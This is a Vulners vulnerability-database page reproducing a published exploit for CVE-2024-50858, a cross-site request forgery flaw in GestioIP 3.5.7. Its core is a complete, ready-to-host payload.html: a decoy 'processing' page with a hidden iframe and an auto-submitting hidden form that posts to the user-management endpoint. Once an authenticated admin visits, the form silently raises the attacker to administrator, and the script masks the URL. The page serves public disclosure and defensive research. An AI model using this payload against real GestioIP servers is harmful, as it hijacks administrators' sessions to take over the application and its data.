Vulners
Lucene search
GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2024-50858 | 15 Jan 202500:03 | – | circl |
 | GestioIP 安全漏洞 | 14 Jan 202500:00 | – | cnnvd |
 | CVE-2024-50858 | 14 Jan 202500:00 | – | cve |
 | CVE-2024-50858 | 14 Jan 202500:00 | – | cvelist |
 | CVE-2024-50858 | 14 Jan 202522:15 | – | nvd |
 | CVE-2024-50858 | 14 Jan 202522:15 | – | osv |
 | 📄 GestioIP 3.5.7 Cross Site Request Forgery | 15 Apr 202500:00 | – | packetstorm |
 | PT-2025-2891 · Gestioip · Gestioip | 14 Jan 202500:00 | – | ptsecurity |
 | CVE-2024-50858 | 23 May 202507:04 | – | redhatcve |
 | CVE-2024-50858 | 14 Jan 202500:00 | – | vulnrichment |
10
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858
### Description
The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
### Prerequisites
The option "Manage - Manage GestioIP - User Management" must be enabled previously.
### Usage
To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
### File: payload.html
#### example: editing user named 'maxi'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->
<iframe name="hiddenFrame"></iframe>
<!-- The form that makes the POST to GestioIP Server -->
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Apr 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.18.8
EPSS0.01078
SSVC